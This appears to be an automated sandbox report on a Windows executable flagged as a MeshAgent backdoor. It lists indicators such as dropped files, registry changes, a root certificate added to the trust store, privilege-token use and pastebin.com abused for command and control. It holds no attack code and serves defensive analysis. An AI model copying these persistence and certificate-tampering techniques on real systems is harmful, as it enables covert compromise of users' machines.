Malware Analysis Report

2024-10-19 07:37

Sample ID 241014-cl8ckawcja
Target e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe
SHA256 e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f
Tags
discovery meshagent backdoor execution persistence rat trojan
score
10/10


Analysis Overview

score
10/10

SHA256

e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f

Threat Level: Known bad

The file e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe was found to be: Known bad.

Malicious Activity Summary

discovery meshagent backdoor execution persistence rat trojan

MeshAgent

Detects MeshAgent payload

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Sets service image path in registry

Downloads MZ/PE file

Loads dropped DLL

Executes dropped EXE

Checks computer location settings

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Program Files directory

Enumerates physical storage devices

Program crash

Unsigned PE

System Location Discovery: System Language Discovery

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Modifies system certificate store

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-14 02:11

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-14 02:10

Reported

2024-10-14 02:13

Platform

win7-20240903-en

Max time kernel

118s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Install(4).exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Install(4).exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Install(4).exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\pdfFiller\Griffin.Core.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\WebView2Loader.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-9HLP1.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-GRU83.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\microsoft.management.infrastructure.native.unmanaged.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\Newtonsoft.Json.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\System.Buffers.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-CBKVG.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-IMI8Q.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-G65F7.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\System.Runtime.CompilerServices.Unsafe.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-8AJVJ.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-TG47L.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\DeviceId.Windows.Mmi.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-G5O1G.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-JFKAP.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\System.Reactive.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-RQP8R.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-VQBU6.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-JJ1PJ.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\MaterialDesignThemes.Wpf.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\Microsoft.Bcl.AsyncInterfaces.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\Castle.Core.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-1M77N.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\pdfFiller.exe C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\System.Text.Encodings.Web.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-OV015.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-SEG0P.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-853J2.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-1VVJM.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-C729U.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-7ROG4.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\SimpleInjector.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-RITHH.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-BBUDG.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\microsoft.management.infrastructure.native.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-8DNN2.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-PIRNP.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-7LH4R.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\AutoUpdater.NET.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-LIBOD.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-B0AS7.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\Microsoft.Web.WebView2.WinForms.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\DeviceId.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\Microsoft.Web.WebView2.Wpf.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-2DQ6B.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-LTG6T.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\MaterialDesignColors.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\Microsoft.Web.WebView2.Core.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\Refit.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-4QSLL.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-RKRJ7.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\DeviceId.Windows.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-TPIV8.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-TA7AJ.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\System.Numerics.Vectors.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\Microsoft.Xaml.Behaviors.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\microsoft.management.infrastructure.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\System.ValueTuple.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-MMVEH.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-G3S1R.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-LR236.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\pdfFiller\pdfFiller.exe

System Location Discovery: System Language Discovery

discovery

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\more.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\more.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Install(4).exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\more.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\WMIC.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ppt\OpenWithProgids\pdfFillerFile.ppt C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.pptx\OpenWithProgids\pdfFillerFile.pptx C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\.txt\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\.jpg\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.pdf\OpenWithProgids\pdfFillerFile.pdf C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\pdffiller\shell\open C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\.docx\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\pdffiller C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pdffiller\DefaultIcon\ = "C:\\Program Files (x86)\\pdfFiller\\pdfFiller.exe,0" C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\.jpeg\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\.png\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\pdffiller\shell\open\command C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\pdffiller C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.jpeg\OpenWithProgids\pdfFillerFile.jpeg C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\pdffiller\shell C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\.pptx\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pdffiller\ = "URL:pdfFiller Protocol" C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\pdffiller\DefaultIcon C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\.doc\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.doc\OpenWithProgids\pdfFillerFile.doc C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\.ppt\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.txt\OpenWithProgids\pdfFillerFile.txt C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.jpg\OpenWithProgids\pdfFillerFile.jpg C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pdffiller\Url Protocol C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\pdffiller\shell\open\command C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\.pdf\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.png\OpenWithProgids\pdfFillerFile.png C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pdffiller\shell\open\command\ = "\"C:\\Program Files (x86)\\pdfFiller\\pdfFiller.exe\" \"%1\"" C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.docx\OpenWithProgids\pdfFillerFile.docx C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A

Modifies system certificate store

evasion spyware trojan

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = (certificate blob not preserved in this copy of the report) C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = (certificate blob not preserved in this copy of the report) C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = (certificate blob not preserved in this copy of the report) C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
